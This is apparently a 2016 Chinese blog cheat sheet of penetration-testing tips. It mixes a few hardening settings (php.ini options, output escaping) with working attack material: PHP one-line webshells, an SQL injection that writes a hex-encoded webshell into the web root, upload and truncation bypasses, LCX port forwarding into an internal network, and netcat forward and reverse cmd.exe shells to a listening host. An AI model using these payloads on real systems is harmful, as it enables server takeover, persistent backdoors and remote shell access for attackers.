常用知识一

Author Avatar
Geroge Lee 11月 15, 2016
  • 在其它设备中阅读本文章

1、Nmap扫描网段内存活的主机,nmap -sn xxx.xxx.xxx.0/24

2、MySQL 连接远程数据库(192.168.5.116),端口“3306”,用户名为“root”,密码“123456”
C:/>mysql -h 192.168.5.116 -P 3306 -u root -p123456

3、解决宽字节注入办法:
mysql_query(“SET character_set_connection=gbk,character_set_results=gbk,character_set_client=binary”, $conn);

4、图片一句话木马:copy 1.jpg/b+1.asp/a 2.jpg

5、流量分析:foremost+strings

6、常用端口:
一 :Oracle端口号,默认是1521
二:SQL Server(mssql)端口号,默认是1433
三:MySQL端口号,默认3306
四:pointbase端口号,默认是9092
五:DB2端口号,默认是5000
六:Redis端口,(nosql)默认端口6379
七:Mongodb端口,(nosql)默认端口27017

7、在php.ini 中把display_errors 选项设为display_errors = off 这样就可以防止报错注入

8、在php.ini 中把disable_functions= 配置,这个禁止命令执行的几个函数,即可禁止命令执行
如:disable_functions=system,passthru,shell_exec,exec,popen

9、配置文件包含漏洞php.ini中
1、allow_url_fopen=off allow_url_include=off
2、将包含的路径或者读取路径写死,仅允许读取指定的文件
3、expose_php=off

10、PHP防止文件包含下的目录遍历:open_basedir = G:\wamp\www\FIleInclude\

11、sql注入插入一句话:
select 0x273C3F706870206576616C28245F504F53545B3132335D293B3F3E27 into outfile ‘/var/www/html/1.php’#
0x273C3F706870206576616C28245F504F53545B3132335D293B3F3E27=’<?php eval($_POST[123]);?>’

12、上传文件:(gif9a)

shell.php;.jpg 或shell.php.a;.jpg

13、php黑魔法:php2、php3、php5、php7、phpa、phpb、phP
“%00”、”/0”,”?”、”///////////….//////“、”%80-%99”都可以截断

14、or 在黑名单中时,可以使用 || 绕过

15、.swp .swo 都是vim编辑文件时的临时文件(称为交换文件)

16、php下的一句话
<?php eval($_POST[cmd]);?>

<?php assert($_POST[cmd]);?>

<?php ($_=@$GET[2]).@$($_POST[1])?>

在菜刀里写入http://site/1.php?2=assert密码是1

密码是 -7

17、写入一句话到指定目录:
<?php
file_put_contents(“E:/php.php”,”<?php eval(\$_POST[cmd];?>”);
?>

18、端口映射:

1、LCX转发
内网机器上执行:lcx.exe –slave 公网IP +端口 内网IP +端口
例如:lcx.exe –slave 192.168.43.142 51 192.168.43.137 3389

将内网(192.168.43.137)的3389端口转发到公网(192.168.43.142)的51端口
然后在公网的机器上:
Lcx.exe –listen 监听51端口,转发到公网机器的3389端口
例如:Lcx.exe –listen 51 3389

我们在本地机器上远程公网IP+3389 ,就连接上了内网机器的3389

19、NC 反弹CMDshell
本机:192.168.43.142(win7) 远程机器:192.168.43.137(xp)

正向连接:
在远程机器上(t参数可以省略):nc -l -p 8888 -t -e cmd.exe
在本机:nc -nvv 192.168.43.137 8888
成功之后,本地机器就获得了一个远程机器的shell

反向连接:
在本机运行上:nc -l -p 8888
在远程主机上:nc -t -e cmd.exe 192.168.43.142 8888
然后成功之后,我们在本地机器上看一下,已经获得了远程机器的cmdshell

20、
windows下
tasklist 查看进程
taskkill 结束进程

21、XSS解决方法:
htmlspecialchars进行过滤